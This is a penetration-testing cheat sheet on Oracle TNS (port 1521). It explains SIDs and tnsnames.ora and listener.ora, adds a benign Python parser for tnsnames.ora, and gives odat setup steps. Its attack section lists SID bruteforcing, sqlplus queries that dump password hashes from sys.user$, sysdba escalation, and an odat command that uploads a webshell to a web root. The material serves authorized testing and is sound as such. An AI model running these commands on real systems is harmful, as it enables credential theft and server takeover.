Oracle TNS (1521)

Oracle Transparent Network Substrate.

Protocol Information

Oracle TNS is the protocol that carries communication between Oracle databases and applications over a network. It is often used with other Oracle services such as Oracle DBSNMP, Oracle Databases, Oracle Application Server, Oracle Enterprise Manager, Oracle Fusion Middleware, Web servers, and many others. It supports different levels of encryption and provides error reporting and logging.

In Oracle RDBMS, a System Identifier (SID) is a unique name that identifies a particular database instance. A database can have multiple instances, each with its own SID. For example, in an Oracle RAC environment, a single physical database is accessible from multiple Oracle instances spread across different nodes in a cluster. Each instance has its own unique SID, but all instances share the same set of database files. This configuration provides scalability and high availability. SIDs are an essential part of the connection process, as they identify the specific database instance to which the client wishes to connect.

Port

1521 TCP

Oracle TNS

Config File

In $ORACLE_HOME/network/admin/:

  • tnsnames.ora : Each database or service has a unique entry in the tnsnames.ora file, containing the information necessary for clients to connect to the service. The entry consists of a name for the service, the network location of the service, and the name of the database or service that clients must use when connecting to the service. In other words, it resolves service names into network addresses, telling clients how to find the databases.

  • listener.ora : A server-side configuration file that defines the properties and parameters of the listener process, which receives incoming client requests and forwards them to the appropriate Oracle database instance. In other words, it configures the listener, the program that sits on the server and listens for connection requests from clients, and tells the server how to listen for them.
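
The entry structure described above can be read programmatically, for instance to inventory which hosts, ports and instances client machines are configured to reach. The Python parser below is an added example, not part of the original page or of odat; the sample file content is constructed, and quoted values are not handled.

```python
import re
# Constructed sample: aliases, hosts and instance names are made up.
SAMPLE = """\
# lab databases
ORCL =
  (DESCRIPTION =
    (ADDRESS = (PROTOCOL = TCP)(HOST = db01.example.internal)(PORT = 1521))
    (CONNECT_DATA = (SERVER = DEDICATED)(SERVICE_NAME = orcl.example.internal)))
LEGACY =
  (DESCRIPTION =
    (ADDRESS_LIST = (ADDRESS = (PROTOCOL = TCP)(HOST = 10.0.0.15)(PORT = 1522)))
    (CONNECT_DATA = (SID = XE)))
"""
_WS = re.compile(r"\s*")
FIELDS = ("HOST", "PORT", "SID", "SERVICE_NAME")

def _parse_group(s, i):
    """Parse one '(KEY = value)' group at s[i]; value is a literal or nested groups."""
    eq = s.index("=", i)
    key = s[i + 1:eq].strip().upper()
    i = _WS.match(s, eq + 1).end()
    if s[i:i + 1] == "(":                       # value is a run of nested groups
        value = []
        while s[i:i + 1] == "(":
            child, i = _parse_group(s, i)
            value.append(child)
            i = _WS.match(s, i).end()
    else:                                       # value is a bare literal
        end = s.index(")", i)
        value, i = s[i:end].strip(), end
    if s[i:i + 1] != ")":
        raise ValueError(f"unbalanced parentheses in group {key!r}")
    return (key, value), i + 1

def _find(groups, want):
    """Depth-first search for the first literal stored under `want` (None if absent)."""
    for key, val in groups:
        hit = _find(val, want) if isinstance(val, list) else (val if key == want else None)
        if hit is not None:
            return hit

def parse_tnsnames(text):
    """Return {ALIAS: {host, port, sid, service_name}} for each entry."""
    text = re.sub(r"(?m)^\s*#.*$", "", text)    # drop comment lines
    entries = {}
    for m in re.finditer(r"(?m)^([\w.,-]+)\s*=\s*(?=\()", text):  # alias at column 0
        group, _ = _parse_group(text, m.end())
        entries[m.group(1).upper()] = {k.lower(): _find([group], k) for k in FIELDS}
    return entries
```

Calling `parse_tnsnames(SAMPLE)` returns one dictionary per alias; a field that the entry does not define is `None`.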

Interact

Installation of the necessary tools

#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
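# Use an absolute path so the client libraries and sqlplus are still found after changing directory
export LD_LIBRARY_PATH=$PWD/instantclient_21_12:$LD_LIBRARY_PATH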
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

Documentation HERE.

sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID>
> select table_name from all_tables;
> select * from user_role_privs;
> select name, password from sys.user$;

If you have an error with sqlplus:

export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib:$ORACLE_HOME
# or
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig

Attacks

SID Bruteforcing

Nmap NSE: --script oracle-sid-brute

Enumeration with odat.

./odat.py all -s <IP>

PrivEsc to sysdba

sqlplus <USERNAME>/<PASSWORD>@<IP>/<SID> as sysdba
> select * from user_role_privs;
> select name, password from sys.user$;

Upload webshell to website (if present) with odat.

./odat.py utlfile -s <IP> -d <SID> -U <USER> -P <PASS> --sysdba --putFile <PATH> <NameFileOnServer> ./<myFile>
# ex. <PATH> : C:\\inetpub\\wwwroot
